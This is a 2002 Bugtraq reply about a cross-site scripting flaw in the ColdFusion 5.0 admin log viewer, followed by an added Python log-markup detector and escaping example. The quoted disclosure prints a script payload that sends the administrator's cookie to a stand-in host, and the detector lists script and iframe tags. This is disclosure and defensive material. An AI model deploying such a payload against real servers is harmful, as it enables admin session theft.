[28215] in bugtraq
Re: Cross-site scripting vulnerability in CF 5.0
daemon@ATHENA.MIT.EDU (SecurityFocus@cubesearch.com)
Mon Dec 16 15:08:38 2002
Date: Mon, 16 Dec 2002 11:24:15 -0800 (PST)
From: <SecurityFocus@cubesearch.com>
To: KiLL CoLe <killcole@yahoo.com>
In-Reply-To: <20021216181615.63458.qmail@web12407.mail.yahoo.com>
Message-ID: <Pine.LNX.4.33L2.0212161120550.19653-100000@butch.cubesearch.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Something to note:
The 'view admin log' feature in CF tends to cause stress on the CF
process, and also blocks the log file during opening.
So it's generally better (and safer, with this cross-site scripting
problem that's been around for years) to view the log file via a text
viewer on the system.
By default, it's c:\cfusion\log\*.log
On Mon, 16 Dec 2002, KiLL CoLe wrote:
> Cross-site scripting vulnerability in CF 5.0. This
> issue was brought up to Macromedia on July 22nd, 2002.
> Macromedia issued a fix to me, but I have not seen the
> fix available to the public. The ColdFusion
> Administrator allows you to view your application log
> via your web browser. Under certain conditions, it is
> possible to remotely alter ColdFusion's application
> log. Take the following code:
>
> <CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
> SELECT * FROM Products
> Where ProductId = #int(url.productid)#
> </CFQUERY>
>
> If the INT function encounters a value that is not
> numeric, it throws an exception and writes the value
> that was passed to application.log. Should an
> unsuspecting administrator view the log file via their
> web browser, script could be executed. Analyze this
> code:
> If url.productid (from the above example) were passed
> in as:
>
> <iframe name="frame1" width="0" height="0"></iframe>
> <script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie="
> + document.cookie</script>
>
> This would enable an attacker to steal the value of
> the ColdFusion administrator's cookie. Decrypting the
> ColdFusion admin's password is well documented, and
> exposes a mild-moderate threat to server security.
>
> **NOTE: There are dozens of other functions that throw
> exceptions similar to the INT function.
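The reply above recommends reading the log with a text viewer rather than the browser-based admin viewer. As an added example (not code from either poster), the Python below does the two things a defender would want from any browser log viewer for the problem described: it flags entries that already carry markup, and it HTML-escapes every entry before rendering so the browser shows a payload as text instead of executing it. The sample log lines and their column layout are constructed and assumed, not the real CF 5.0 log format.

```python
import html
import re

# Constructed sample of a ColdFusion application.log (layout is an
# assumption, not the exact CF 5.0 format). Line 2 carries the kind of
# markup the thread describes, injected through a failed int() conversion.
SAMPLE_LOG = (
    '"Error","12/16/02","11:20:15","Parameter 1 of function Int, which is now '
    'abc, must be a numeric value"\n'
    '"Error","12/16/02","11:21:02","Parameter 1 of function Int, which is now '
    '<iframe name=\\"f1\\"></iframe><script>x</script>, must be a numeric value"\n'
    '"Information","12/16/02","11:22:00","Application started"\n'
)

# Tags, schemes and event handlers that have no business in a log entry;
# a match means the entry contains attacker-controlled markup.
MARKUP_RE = re.compile(
    r"<\s*/?\s*(?:script|iframe|object|embed|img|svg|body|meta|link)\b"
    r"|javascript\s*:"
    r"|\bon[a-z]+\s*=",
    re.IGNORECASE,
)


def find_markup_entries(log_text):
    """Return (line_number, line) for every log entry containing markup."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        if MARKUP_RE.search(line):
            hits.append((number, line))
    return hits


def render_log_html(log_text):
    """Render the log for a browser with every entry HTML-escaped.

    The log content is untrusted input, so angle brackets and quotes are
    turned into entities before the text is placed in the page.
    """
    rows = "\n".join(html.escape(line, quote=True) for line in log_text.splitlines())
    return "<pre>" + rows + "</pre>"


if __name__ == "__main__":
    for number, line in find_markup_entries(SAMPLE_LOG):
        print(f"line {number}: markup found in log entry: {line[:60]}...")
    print(render_log_html(SAMPLE_LOG))
```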